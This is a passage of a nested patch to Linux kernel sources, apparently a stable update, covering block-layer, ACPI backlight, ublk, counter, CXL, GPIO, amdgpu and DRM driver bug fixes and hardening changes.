+ 		start_parent_slice_with_credit(tg, parent_tg, rw);
+ 	} else {
++		bio_set_flag(bio, BIO_BPS_THROTTLED);
+ 		throtl_qnode_add_bio(bio, &tg->qnode_on_parent[rw],
+ 				     &parent_sq->queued[rw]);
+ 		BUG_ON(tg->td->nr_queued[rw] <= 0);
+diff --git a/block/genhd.c b/block/genhd.c
+index 0b6928e948f31..62a61388e752d 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -368,7 +368,6 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+ 
+-	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	/*
+ 	 * If the device is opened exclusively by current thread already, it's
+ 	 * safe to scan partitons, otherwise, use bd_prepare_to_claim() to
+@@ -381,12 +380,19 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ 			return ret;
+ 	}
+ 
++	set_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+ 		ret =  PTR_ERR(bdev);
+ 	else
+ 		blkdev_put(bdev, mode & ~FMODE_EXCL);
+ 
++	/*
++	 * If blkdev_get_by_dev() failed early, GD_NEED_PART_SCAN is still set,
++	 * and this will cause that re-assemble partitioned raid device will
++	 * creat partition for underlying disk.
++	 */
++	clear_bit(GD_NEED_PART_SCAN, &disk->state);
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(disk->part0, disk_scan_partitions);
+ 	return ret;
+diff --git a/drivers/acpi/acpi_video.c b/drivers/acpi/acpi_video.c
+index 0c79f463fbfd4..ed318485eb192 100644
+--- a/drivers/acpi/acpi_video.c
++++ b/drivers/acpi/acpi_video.c
+@@ -1984,6 +1984,7 @@ static int instance;
+ static int acpi_video_bus_add(struct acpi_device *device)
+ {
+ 	struct acpi_video_bus *video;
++	bool auto_detect;
+ 	int error;
+ 	acpi_status status;
+ 
+@@ -2045,10 +2046,20 @@ static int acpi_video_bus_add(struct acpi_device *device)
+ 	mutex_unlock(&video_list_lock);
+ 
+ 	/*
+-	 * The userspace visible backlight_device gets registered separately
+-	 * from acpi_video_register_backlight().
++	 * If backlight-type auto-detection is used then a native backlight may
++	 * show up later and this may change the result from video to native.
++	 * Therefor normally the userspace visible /sys/class/backlight device
++	 * gets registered separately by the GPU driver calling
++	 * acpi_video_register_backlight() when an internal panel is detected.
++	 * Register the backlight now when not using auto-detection, so that
++	 * when the kernel cmdline or DMI-quirks are used the backlight will
++	 * get registered even if acpi_video_register_backlight() is not called.
+ 	 */
+ 	acpi_video_run_bcl_for_osi(video);
++	if (__acpi_video_get_backlight_type(false, &auto_detect) == acpi_backlight_video &&
++	    !auto_detect)
++		acpi_video_bus_register_backlight(video);
++
+ 	acpi_video_bus_add_notify_handler(video);
+ 
+ 	return 0;
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index f06b3d3556710..42b5af5490a11 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -274,6 +274,43 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		},
+ 	},
+ 
++	/*
++	 * Models which need acpi_video backlight control where the GPU drivers
++	 * do not call acpi_video_register_backlight() because no internal panel
++	 * is detected. Typically these are all-in-ones (monitors with builtin
++	 * PC) where the panel connection shows up as regular DP instead of eDP.
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,1 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,1"),
++		},
++	},
++	{
++	 .callback = video_detect_force_video,
++	 /* Apple iMac14,2 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Apple Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "iMac14,2"),
++		},
++	},
++
++	/*
++	 * Older models with nvidia GPU which need acpi_video backlight
++	 * control and where the old nvidia binary driver series does not
++	 * call acpi_video_register_backlight().
++	 */
++	{
++	 .callback = video_detect_force_video,
++	 /* ThinkPad W530 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad W530"),
++		},
++	},
++
+ 	/*
+ 	 * These models have a working acpi_video backlight control, and using
+ 	 * native backlight causes a regression where backlight does not work
+@@ -772,7 +809,7 @@ static bool prefer_native_over_acpi_video(void)
+  * Determine which type of backlight interface to use on this system,
+  * First check cmdline, then dmi quirks, then do autodetect.
+  */
+-static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
++enum acpi_backlight_type __acpi_video_get_backlight_type(bool native, bool *auto_detect)
+ {
+ 	static DEFINE_MUTEX(init_mutex);
+ 	static bool nvidia_wmi_ec_present;
+@@ -797,6 +834,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 		native_available = true;
+ 	mutex_unlock(&init_mutex);
+ 
++	if (auto_detect)
++		*auto_detect = false;
++
+ 	/*
+ 	 * The below heuristics / detection steps are in order of descending
+ 	 * presedence. The commandline takes presedence over anything else.
+@@ -808,6 +848,9 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (acpi_backlight_dmi != acpi_backlight_undef)
+ 		return acpi_backlight_dmi;
+ 
++	if (auto_detect)
++		*auto_detect = true;
++
+ 	/* Special cases such as nvidia_wmi_ec and apple gmux. */
+ 	if (nvidia_wmi_ec_present)
+ 		return acpi_backlight_nvidia_wmi_ec;
+@@ -827,15 +870,4 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	/* No ACPI video/native (old hw), use vendor specific fw methods. */
+ 	return acpi_backlight_vendor;
+ }
+-
+-enum acpi_backlight_type acpi_video_get_backlight_type(void)
+-{
+-	return __acpi_video_get_backlight_type(false);
+-}
+-EXPORT_SYMBOL(acpi_video_get_backlight_type);
+-
+-bool acpi_video_backlight_use_native(void)
+-{
+-	return __acpi_video_get_backlight_type(true) == acpi_backlight_native;
+-}
+-EXPORT_SYMBOL(acpi_video_backlight_use_native);
++EXPORT_SYMBOL(__acpi_video_get_backlight_type);
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 22a790d512842..2ed994a313a91 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -233,7 +233,7 @@ static int ublk_validate_params(const struct ublk_device *ub)
+ 	if (ub->params.types & UBLK_PARAM_TYPE_BASIC) {
+ 		const struct ublk_param_basic *p = &ub->params.basic;
+ 
+-		if (p->logical_bs_shift > PAGE_SHIFT)
++		if (p->logical_bs_shift > PAGE_SHIFT || p->logical_bs_shift < 9)
+ 			return -EINVAL;
+ 
+ 		if (p->logical_bs_shift > p->physical_bs_shift)
+@@ -1202,9 +1202,10 @@ static void ublk_handle_need_get_data(struct ublk_device *ub, int q_id,
+ 	ublk_queue_cmd(ubq, req);
+ }
+ 
+-static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++static int __ublk_ch_uring_cmd(struct io_uring_cmd *cmd,
++			       unsigned int issue_flags,
++			       struct ublksrv_io_cmd *ub_cmd)
+ {
+-	struct ublksrv_io_cmd *ub_cmd = (struct ublksrv_io_cmd *)cmd->cmd;
+ 	struct ublk_device *ub = cmd->file->private_data;
+ 	struct ublk_queue *ubq;
+ 	struct ublk_io *io;
+@@ -1306,6 +1307,23 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ }
+ 
++static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
++{
++	struct ublksrv_io_cmd *ub_src = (struct ublksrv_io_cmd *) cmd->cmd;
++	struct ublksrv_io_cmd ub_cmd;
++
++	/*
++	 * Not necessary for async retry, but let's keep it simple and always
++	 * copy the values to avoid any potential reuse.
++	 */
++	ub_cmd.q_id = READ_ONCE(ub_src->q_id);
++	ub_cmd.tag = READ_ONCE(ub_src->tag);
++	ub_cmd.result = READ_ONCE(ub_src->result);
++	ub_cmd.addr = READ_ONCE(ub_src->addr);
++
++	return __ublk_ch_uring_cmd(cmd, issue_flags, &ub_cmd);
++}
++
+ static const struct file_operations ublk_ch_fops = {
+ 	.owner = THIS_MODULE,
+ 	.open = ublk_ch_open,
+@@ -1886,6 +1904,8 @@ static int ublk_ctrl_set_params(struct io_uring_cmd *cmd)
+ 		/* clear all we don't support yet */
+ 		ub->params.types &= UBLK_PARAM_TYPE_ALL;
+ 		ret = ublk_validate_params(ub);
++		if (ret)
++			ub->params.types = 0;
+ 	}
+ 	mutex_unlock(&ub->mutex);
+ 	ublk_put_device(ub);
+diff --git a/drivers/counter/104-quad-8.c b/drivers/counter/104-quad-8.c
+index deed4afadb298..d9cb937665cfc 100644
+--- a/drivers/counter/104-quad-8.c
++++ b/drivers/counter/104-quad-8.c
+@@ -97,10 +97,6 @@ struct quad8 {
+ 	struct quad8_reg __iomem *reg;
+ };
+ 
+-/* Borrow Toggle flip-flop */
+-#define QUAD8_FLAG_BT BIT(0)
+-/* Carry Toggle flip-flop */
+-#define QUAD8_FLAG_CT BIT(1)
+ /* Error flag */
+ #define QUAD8_FLAG_E BIT(4)
+ /* Up/Down flag */
+@@ -133,6 +129,9 @@ struct quad8 {
+ #define QUAD8_CMR_QUADRATURE_X2 0x10
+ #define QUAD8_CMR_QUADRATURE_X4 0x18
+ 
++/* Each Counter is 24 bits wide */
++#define LS7267_CNTR_MAX GENMASK(23, 0)
++
+ static int quad8_signal_read(struct counter_device *counter,
+ 			     struct counter_signal *signal,
+ 			     enum counter_signal_level *level)
+@@ -156,18 +155,10 @@ static int quad8_count_read(struct counter_device *counter,
+ {
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	struct channel_reg __iomem *const chan = priv->reg->channel + count->id;
+-	unsigned int flags;
+-	unsigned int borrow;
+-	unsigned int carry;
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	flags = ioread8(&chan->control);
+-	borrow = flags & QUAD8_FLAG_BT;
+-	carry = !!(flags & QUAD8_FLAG_CT);
+-
+-	/* Borrow XOR Carry effectively doubles count range */
+-	*val = (unsigned long)(borrow ^ carry) << 24;
++	*val = 0;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+ 
+@@ -191,8 +182,7 @@ static int quad8_count_write(struct counter_device *counter,
+ 	unsigned long irqflags;
+ 	int i;
+ 
+-	/* Only 24-bit values are supported */
+-	if (val > 0xFFFFFF)
++	if (val > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -378,7 +368,7 @@ static int quad8_action_read(struct counter_device *counter,
+ 
+ 	/* Handle Index signals */
+ 	if (synapse->signal->id >= 16) {
+-		if (priv->preset_enable[count->id])
++		if (!priv->preset_enable[count->id])
+ 			*action = COUNTER_SYNAPSE_ACTION_RISING_EDGE;
+ 		else
+ 			*action = COUNTER_SYNAPSE_ACTION_NONE;
+@@ -806,8 +796,7 @@ static int quad8_count_preset_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (preset > 0xFFFFFF)
++	if (preset > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+@@ -834,8 +823,7 @@ static int quad8_count_ceiling_read(struct counter_device *counter,
+ 		*ceiling = priv->preset[count->id];
+ 		break;
+ 	default:
+-		/* By default 0x1FFFFFF (25 bits unsigned) is maximum count */
+-		*ceiling = 0x1FFFFFF;
++		*ceiling = LS7267_CNTR_MAX;
+ 		break;
+ 	}
+ 
+@@ -850,8 +838,7 @@ static int quad8_count_ceiling_write(struct counter_device *counter,
+ 	struct quad8 *const priv = counter_priv(counter);
+ 	unsigned long irqflags;
+ 
+-	/* Only 24-bit values are supported */
+-	if (ceiling > 0xFFFFFF)
++	if (ceiling > LS7267_CNTR_MAX)
+ 		return -ERANGE;
+ 
+ 	spin_lock_irqsave(&priv->lock, irqflags);
+diff --git a/drivers/cxl/core/pci.c b/drivers/cxl/core/pci.c
+index 9240df53ed875..a8456d5441fc7 100644
+--- a/drivers/cxl/core/pci.c
++++ b/drivers/cxl/core/pci.c
+@@ -483,7 +483,7 @@ static struct pci_doe_mb *find_cdat_doe(struct device *uport)
+ 	return NULL;
+ }
+ 
+-#define CDAT_DOE_REQ(entry_handle)					\
++#define CDAT_DOE_REQ(entry_handle) cpu_to_le32				\
+ 	(FIELD_PREP(CXL_DOE_TABLE_ACCESS_REQ_CODE,			\
+ 		    CXL_DOE_TABLE_ACCESS_REQ_CODE_READ) |		\
+ 	 FIELD_PREP(CXL_DOE_TABLE_ACCESS_TABLE_TYPE,			\
+@@ -496,8 +496,8 @@ static void cxl_doe_task_complete(struct pci_doe_task *task)
+ }
+ 
+ struct cdat_doe_task {
+-	u32 request_pl;
+-	u32 response_pl[32];
++	__le32 request_pl;
++	__le32 response_pl[32];
+ 	struct completion c;
+ 	struct pci_doe_task task;
+ };
+@@ -531,10 +531,10 @@ static int cxl_cdat_get_length(struct device *dev,
+ 		return rc;
+ 	}
+ 	wait_for_completion(&t.c);
+-	if (t.task.rv < sizeof(u32))
++	if (t.task.rv < 2 * sizeof(__le32))
+ 		return -EIO;
+ 
+-	*length = t.response_pl[1];
++	*length = le32_to_cpu(t.response_pl[1]);
+ 	dev_dbg(dev, "CDAT length %zu\n", *length);
+ 
+ 	return 0;
+@@ -545,13 +545,13 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			       struct cxl_cdat *cdat)
+ {
+ 	size_t length = cdat->length;
+-	u32 *data = cdat->table;
++	__le32 *data = cdat->table;
+ 	int entry_handle = 0;
+ 
+ 	do {
+ 		DECLARE_CDAT_DOE_TASK(CDAT_DOE_REQ(entry_handle), t);
++		struct cdat_entry_header *entry;
+ 		size_t entry_dw;
+-		u32 *entry;
+ 		int rc;
+ 
+ 		rc = pci_doe_submit_task(cdat_doe, &t.task);
+@@ -560,26 +560,34 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			return rc;
+ 		}
+ 		wait_for_completion(&t.c);
+-		/* 1 DW header + 1 DW data min */
+-		if (t.task.rv < (2 * sizeof(u32)))
++
++		/* 1 DW Table Access Response Header + CDAT entry */
++		entry = (struct cdat_entry_header *)(t.response_pl + 1);
++		if ((entry_handle == 0 &&
++		     t.task.rv != sizeof(__le32) + sizeof(struct cdat_header)) ||
++		    (entry_handle > 0 &&
++		     (t.task.rv < sizeof(__le32) + sizeof(*entry) ||
++		      t.task.rv != sizeof(__le32) + le16_to_cpu(entry->length))))
+ 			return -EIO;
+ 
+ 		/* Get the CXL table access header entry handle */
+ 		entry_handle = FIELD_GET(CXL_DOE_TABLE_ACCESS_ENTRY_HANDLE,
+-					 t.response_pl[0]);
+-		entry = t.response_pl + 1;
+-		entry_dw = t.task.rv / sizeof(u32);
++					 le32_to_cpu(t.response_pl[0]));
++		entry_dw = t.task.rv / sizeof(__le32);
+ 		/* Skip Header */
+ 		entry_dw -= 1;
+-		entry_dw = min(length / sizeof(u32), entry_dw);
++		entry_dw = min(length / sizeof(__le32), entry_dw);
+ 		/* Prevent length < 1 DW from causing a buffer overflow */
+ 		if (entry_dw) {
+-			memcpy(data, entry, entry_dw * sizeof(u32));
+-			length -= entry_dw * sizeof(u32);
++			memcpy(data, entry, entry_dw * sizeof(__le32));
++			length -= entry_dw * sizeof(__le32);
+ 			data += entry_dw;
+ 		}
+ 	} while (entry_handle != CXL_DOE_TABLE_ACCESS_LAST_ENTRY);
+ 
++	/* Length in CDAT header may exceed concatenation of CDAT entries */
++	cdat->length -= length;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/cxl/cxlpci.h b/drivers/cxl/cxlpci.h
+index eec597dbe763a..79e5603dfc82d 100644
+--- a/drivers/cxl/cxlpci.h
++++ b/drivers/cxl/cxlpci.h
+@@ -71,6 +71,20 @@ static inline resource_size_t cxl_regmap_to_base(struct pci_dev *pdev,
+ 	return pci_resource_start(pdev, map->barno) + map->block_offset;
+ }
+ 
++struct cdat_header {
++	__le32 length;
++	u8 revision;
++	u8 checksum;
++	u8 reserved[6];
++	__le32 sequence;
++} __packed;
++
++struct cdat_entry_header {
++	u8 type;
++	u8 reserved;
++	__le16 length;
++} __packed;
++
+ int devm_cxl_port_enumerate_dports(struct cxl_port *port);
+ struct cxl_dev_state;
+ int cxl_hdm_decode_init(struct cxl_dev_state *cxlds, struct cxl_hdm *cxlhdm);
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index a01af11806164..e3af86f06c630 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -100,7 +100,7 @@ config GPIO_GENERIC
+ 	tristate
+ 
+ config GPIO_REGMAP
+-	depends on REGMAP
++	select REGMAP
+ 	tristate
+ 
+ # put drivers in the right section, in alphabetical order
+diff --git a/drivers/gpio/gpio-davinci.c b/drivers/gpio/gpio-davinci.c
+index 59c4c48d8296b..69f3d864f69d3 100644
+--- a/drivers/gpio/gpio-davinci.c
++++ b/drivers/gpio/gpio-davinci.c
+@@ -328,7 +328,7 @@ static struct irq_chip gpio_irqchip = {
+ 	.irq_enable	= gpio_irq_enable,
+ 	.irq_disable	= gpio_irq_disable,
+ 	.irq_set_type	= gpio_irq_type,
+-	.flags		= IRQCHIP_SET_TYPE_MASKED,
++	.flags		= IRQCHIP_SET_TYPE_MASKED | IRQCHIP_SKIP_SET_WAKE,
+ };
+ 
+ static void gpio_irq_handler(struct irq_desc *desc)
+@@ -645,9 +645,6 @@ static void davinci_gpio_save_context(struct davinci_gpio_controller *chips,
+ 		context->set_falling = readl_relaxed(&g->set_falling);
+ 	}
+ 
+-	/* Clear Bank interrupt enable bit */
+-	writel_relaxed(0, base + BINTEN);
+-
+ 	/* Clear all interrupt status registers */
+ 	writel_relaxed(GENMASK(31, 0), &g->intstat);
+ }
+diff --git a/drivers/gpio/gpio-mvebu.c b/drivers/gpio/gpio-mvebu.c
+index 1bb317b8dccea..91a4232ee58c2 100644
+--- a/drivers/gpio/gpio-mvebu.c
++++ b/drivers/gpio/gpio-mvebu.c
+@@ -657,9 +657,10 @@ static void mvebu_pwm_free(struct pwm_chip *chip, struct pwm_device *pwm)
+ 	spin_unlock_irqrestore(&mvpwm->lock, flags);
+ }
+ 
+-static void mvebu_pwm_get_state(struct pwm_chip *chip,
+-				struct pwm_device *pwm,
+-				struct pwm_state *state) {
++static int mvebu_pwm_get_state(struct pwm_chip *chip,
++			       struct pwm_device *pwm,
++			       struct pwm_state *state)
++{
+ 
+ 	struct mvebu_pwm *mvpwm = to_mvebu_pwm(chip);
+ 	struct mvebu_gpio_chip *mvchip = mvpwm->mvchip;
+@@ -693,6 +694,8 @@ static void mvebu_pwm_get_state(struct pwm_chip *chip,
+ 		state->enabled = false;
+ 
+ 	spin_unlock_irqrestore(&mvpwm->lock, flags);
++
++	return 0;
+ }
+ 
+ static int mvebu_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9ef83f3ab3a7e..9df5dcedaf3e2 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3034,6 +3034,24 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_MES))
+ 			continue;
+ 
++		/* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++		if (adev->in_s0ix &&
++		    (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0)) &&
++		    (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_SDMA))
++			continue;
++
++		/* Once swPSP provides the IMU, RLC FW binaries to TOS during cold-boot.
++		 * These are in TMR, hence are expected to be reused by PSP-TOS to reload
++		 * from this location and RLC Autoload automatically also gets loaded
++		 * from here based on PMFW -> PSP message during re-init sequence.
++		 * Therefore, the psp suspend & resume should be skipped to avoid destroy
++		 * the TMR and reload FWs again for IMU enabled APU ASICs.
++		 */
++		if (amdgpu_in_reset(adev) &&
++		    (adev->flags & AMD_IS_APU) && adev->gfx.imu.funcs &&
++		    adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_PSP)
++			continue;
++
+ 		/* XXX handle errors */
+ 		r = adev->ip_blocks[i].version->funcs->suspend(adev);
+ 		/* XXX handle errors */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 050e7a52c8f62..6c5ea99223bab 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2175,6 +2175,8 @@ static int detect_mst_link_for_all_connectors(struct drm_device *dev)
+ 				DRM_ERROR("DM_MST: Failed to start MST\n");
+ 				aconnector->dc_link->type =
+ 					dc_connection_single;
++				ret = dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
++								     aconnector->dc_link);
+ 				break;
+ 			}
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+index 57454967617f8..6bd7e45370141 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_helpers.c
+@@ -206,7 +206,7 @@ bool dm_helpers_dp_mst_write_payload_allocation_table(
+ 	if (enable)
+ 		drm_dp_add_payload_part1(mst_mgr, mst_state, payload);
+ 	else
+-		drm_dp_remove_payload(mst_mgr, mst_state, payload);
++		drm_dp_remove_payload(mst_mgr, mst_state, payload, payload);
+ 
+ 	/* mst_mgr->->payloads are VC payload notify MST branch using DPCD or
+ 	 * AUX message. The sequence is slot 1-63 allocated sequence for each
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 3b77238ca4aff..ae8c6d9d4095f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -258,6 +258,7 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 		{ 0x8126, 0x55 },
+ 		{ 0x8127, 0x66 },
+ 		{ 0x8128, 0x88 },
++		{ 0x812a, 0x20 },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi86.c b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+index eb24322df721a..aeca9c066bf29 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi86.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi86.c
+@@ -1500,8 +1500,8 @@ out:
+ 	return ret;
+ }
+ 
+-static void ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-				struct pwm_state *state)
++static int ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			       struct pwm_state *state)
+ {
+ 	struct ti_sn65dsi86 *pdata = pwm_chip_to_ti_sn_bridge(chip);
+ 	unsigned int pwm_en_inv;
+@@ -1512,19 +1512,19 @@ static void ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	ret = regmap_read(pdata->regmap, SN_PWM_EN_INV_REG, &pwm_en_inv);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = ti_sn65dsi86_read_u16(pdata, SN_BACKLIGHT_SCALE_REG, &scale);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = ti_sn65dsi86_read_u16(pdata, SN_BACKLIGHT_REG, &backlight);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	ret = regmap_read(pdata->regmap, SN_PWM_PRE_DIV_REG, &pre_div);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	state->enabled = FIELD_GET(SN_PWM_EN_MASK, pwm_en_inv);
+ 	if (FIELD_GET(SN_PWM_INV_MASK, pwm_en_inv))
+@@ -1539,6 +1539,8 @@ static void ti_sn_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	if (state->duty_cycle > state->period)
+ 		state->duty_cycle = state->period;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops ti_sn_pwm_ops = {
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index e77c674b37ca2..38dab76ae69ea 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3342,7 +3342,8 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  * drm_dp_remove_payload() - Remove an MST payload
+  * @mgr: Manager to use.
+  * @mst_state: The MST atomic state
+- * @payload: The payload to write
++ * @old_payload: The payload with its old state
++ * @new_payload: The payload to write
+  *
+  * Removes a payload from an MST topology if it was successfully assigned a start slot. Also updates
+  * the starting time slots of all other payloads which would have been shifted towards the start of
+@@ -3350,36 +3351,37 @@ EXPORT_SYMBOL(drm_dp_add_payload_part1);
+  */
+ void drm_dp_remove_payload(struct drm_dp_mst_topology_mgr *mgr,
+ 			   struct drm_dp_mst_topology_state *mst_state,
+-			   struct drm_dp_mst_atomic_payload *payload)
++			   const struct drm_dp_mst_atomic_payload *old_payload,
++			   struct drm_dp_mst_atomic_payload *new_payload)
+ {
+ 	struct drm_dp_mst_atomic_payload *pos;
+ 	bool send_remove = false;
+ 
+ 	/* We failed to make the payload, so nothing to do */
+-	if (payload->vc_start_slot == -1)
++	if (new_payload->vc_start_slot == -1)
+ 		return;
+ 
+ 	mutex_lock(&mgr->lock);
+-	send_remove = drm_dp_mst_port_downstream_of_branch(payload->port, mgr->mst_primary);
++	send_remove = drm_dp_mst_port_downstream_of_branch(new_payload->port, mgr->mst_primary);
+ 	mutex_unlock(&mgr->lock);
+ 
+ 	if (send_remove)
+-		drm_dp_destroy_payload_step1(mgr, mst_state, payload);
++		drm_dp_destroy_payload_step1(mgr, mst_state, new_payload);
+ 	else
+ 		drm_dbg_kms(mgr->dev, "Payload for VCPI %d not in topology, not sending remove\n",
+-			    payload->vcpi);
++			    new_payload->vcpi);
+ 
+ 	list_for_each_entry(pos, &mst_state->payloads, next) {
+-		if (pos != payload && pos->vc_start_slot > payload->vc_start_slot)
+-			pos->vc_start_slot -= payload->time_slots;
++		if (pos != new_payload && pos->vc_start_slot > new_payload->vc_start_slot)
++			pos->vc_start_slot -= old_payload->time_slots;
+ 	}
+-	payload->vc_start_slot = -1;
++	new_payload->vc_start_slot = -1;
+ 
+ 	mgr->payload_count--;
+-	mgr->next_start_slot -= payload->time_slots;
++	mgr->next_start_slot -= old_payload->time_slots;
+ 
+-	if (payload->delete)
+-		drm_dp_mst_put_port_malloc(payload->port);
++	if (new_payload->delete)
++		drm_dp_mst_put_port_malloc(new_payload->port);
+ }
+ EXPORT_SYMBOL(drm_dp_remove_payload);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index c85757f55112b..78211e583fd7e 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -2098,6 +2098,25 @@ static void glk_read_luts(struct intel_crtc_state *crtc_state)
+ 	}
+ }
+ 
++static void icl_color_commit_arm(const struct intel_crtc_state *crtc_state)
++{
++	struct intel_crtc *crtc = to_intel_crtc(crtc_state->uapi.crtc);
++	struct drm_i915_private *i915 = to_i915(crtc->base.dev);
++	enum pipe pipe = crtc->pipe;
++
++	/*
++	 * We don't (yet) allow userspace to control the pipe background color,
++	 * so force it to black.
++	 */
++	intel_de_write(i915, SKL_BOTTOM_COLOR(pipe), 0);
++
++	intel_de_write(i915, GAMMA_MODE(crtc->pipe),
++		       crtc_state->gamma_mode);
++
++	intel_de_write_fw(i915, PIPE_CSC_MODE(crtc->pipe),
++			  crtc_state->csc_mode);
++}
++
+ static struct drm_property_blob *
+ icl_read_lut_multi_segment(struct intel_crtc *crtc)
+ {
+@@ -2183,7 +2202,7 @@ static const struct intel_color_funcs i9xx_color_funcs = {
+ static const struct intel_color_funcs icl_color_funcs = {
+ 	.color_check = icl_color_check,
+ 	.color_commit_noarm = icl_color_commit_noarm,
+-	.color_commit_arm = skl_color_commit_arm,
++	.color_commit_arm = icl_color_commit_arm,
+ 	.load_luts = icl_load_luts,
+ 	.read_luts = icl_read_luts,
+ };
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 27c2098dd7070..9a6822256ddf6 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -364,8 +364,14 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 	struct intel_dp *intel_dp = &dig_port->dp;
